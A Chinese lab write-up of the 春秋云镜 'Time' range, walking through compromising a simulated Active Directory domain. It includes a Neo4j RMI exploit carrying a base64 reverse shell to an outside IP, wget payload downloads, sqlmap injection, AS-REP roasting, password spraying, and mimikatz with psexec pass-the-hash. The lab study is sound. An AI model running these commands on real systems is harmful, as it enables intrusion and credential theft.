春秋云镜 Time

春秋云镜 Time writeup

继续照着wp复现,学习知识

flag01

fscan扫ip

fscan64 -h 39.99.236.224 -p 1-65535

不指定端口的话好像扫不出来

image-20241128193740954

neo4j数据库,找漏洞

vulhub/neo4j/CVE-2021-34371 at master · vulhub/vulhub (github.com)

自行打包使用即可

java -jar rhino_gadget-1.0-SNAPSHOT-fatjar.jar rmi://39.99.236.224:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTguODkuNjEuNzEvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"

image-20241128194010182

flag02

然后上传工具

cd /tmp

wget http://vps:1338/frpc
wget http://vps:1338/frpc.ini
wget http://vps:1338/fscan

chmod 777 *

看一下ip

image-20241128194156269

./fscan -h 172.22.6.0/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.6.12     is alive
(icmp) Target 172.22.6.25     is alive
(icmp) Target 172.22.6.36     is alive
(icmp) Target 172.22.6.38     is alive
[*] Icmp alive hosts len is: 4
172.22.6.12:88 open
172.22.6.12:445 open
172.22.6.25:445 open
172.22.6.25:139 open
172.22.6.12:139 open
172.22.6.12:135 open
172.22.6.25:135 open
172.22.6.38:80 open
172.22.6.38:22 open
172.22.6.36:22 open
172.22.6.36:7687 open
[*] alive ports len is: 11
start vulscan
[*] NetInfo:
[*]172.22.6.25
   [->]WIN2019
   [->]172.22.6.25
[*] NetInfo:
[*]172.22.6.12
   [->]DC-PROGAME
   [->]172.22.6.12
[*] WebTitle: http://172.22.6.38        code:200 len:1531   title:后台登录
[*] NetBios: 172.22.6.12     [+]DC DC-PROGAME.xiaorang.lab       Windows Server 2016 Datacenter 14393 
[*] NetBios: 172.22.6.25     XIAORANG\WIN2019               
[*] 172.22.6.12  (Windows Server 2016 Datacenter 14393)
[*] WebTitle: https://172.22.6.36:7687  code:400 len:50     title:None
已完成 11/11
[*] 扫描结束,耗时: 14.220446968s
172.22.6.12 #DC-PROGAME.xiaorang.lab
172.22.6.25 #XIAORANG\WIN2019
172.22.6.36 #本机
172.22.6.38 #linux

看172.22.6.38

image-20241128194432065

看wp,是sql注入,上sqlmap (好慢

python sqlmap.py -r 1.txt -D oa_db -T oa_f1Agggg --dump

image-20241128194606905

flag03 & flag04

看一下其他表

image-20241128194621709

考虑枚举域内用户

提取出email列中的数据出来

用工具爆破

kerbrute_windows_amd64 userenum --dc 172.22.6.12 -d xiaorang.lab ~/users.txt -o output.txt

image-20241128194751012

写WP时发现点错误,查数据库时user表有500个,但只显示了后面256个

需要找到csv表自己手动正则

C:\Users\86136\AppData\Local\sqlmap\output\172.22.6.38\dump\oa_db\oa_users.csv

但不影响后面的图,做题时由于sqlmap跑太慢了,我直接把wp中的有效用户直接拿来了

AS-REPRoasting

在AS_REP阶段,会返回由我们请求的域账户hash加密某个值后返回。然后我们通过自身的ntlm hash去解密得到数据。在这里设置不要求预身份验证后,我们可以在AS_REQ阶段,填写想要伪造请求的用户名,随后会用伪造请求的用户名NTLM Hash加密返回给我们。随后我们就可以拿去爆破了

python GetNPUsers.py -dc-ip 172.22.6.12 -usersfile user.txt xiaorang.lab/

image-20241128195029705

拿到hashcat去跑

hashcat -a 0 -m 18200 user.txt rockyou.txt --force

image-20241128200055999

zhangxin@xiaorang.lab : strawberry
wenshao@xiaorang.lab : hellokitty

爆破一下rdp

上一期的win版crackmapexec指定不了协议,不会用,换了一个

python cme rdp 172.22.6.1/24 -u zhangxin -p strawberry -d xiaorang.lab

用哪个用户都行

最后爆出来的都是172.22.6.25这台

image-20241128200235558

然后就能连上去

连上去后进行信息收集

SharpHound.exe -c all

拿到zip包,启动bloodhound上传分析

操蛋的是一直加载不出来

image-20241128200920933

偷个图

image-20230802160246577

image-20241128201113223

SID History

如果将A域中的域用户迁移到B域中,那么在B域中该用户的SID会随之改变,进而影响迁移后用户的权限,导致迁移后的用户不能访问本来可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,即如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。

继续

简单来说yuxuan属于域管,所以现在拿到yuxuan的权限然后dump哈希就好了

看X1r0z佬说了WinPEARS,但我怎么找不到呢

按照名字找了个Release Release refs/heads/master 20241101-6f46e855 · peass-ng/PEASS-ng (github.com)

用exe的不行,用bat找到点东西

Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
    LastUsedUsername    REG_SZ    yuxuan
    DefaultUserName    REG_SZ    yuxuan
    DefaultPassword    REG_SZ    Yuxuan7QbrgZ3L
    DefaultDomainName    REG_SZ    xiaorang.lab

yuxuan是自动登录账户

rdp登录yuxuan

然后传mimikatz上去dump域管hash即可

image-20241128201605505

然后就可以到处横向了

python psexec.py -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.25 -codec gbk

image-20241128201710102

python psexec.py -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.12 -codec gbk

image-20241128201717876

finally

又收获两个知识点


春秋云镜 Time
https://zer0peach.github.io/2024/11/28/春秋云镜-Time/
作者
Zer0peach
发布于
2024年11月28日
许可协议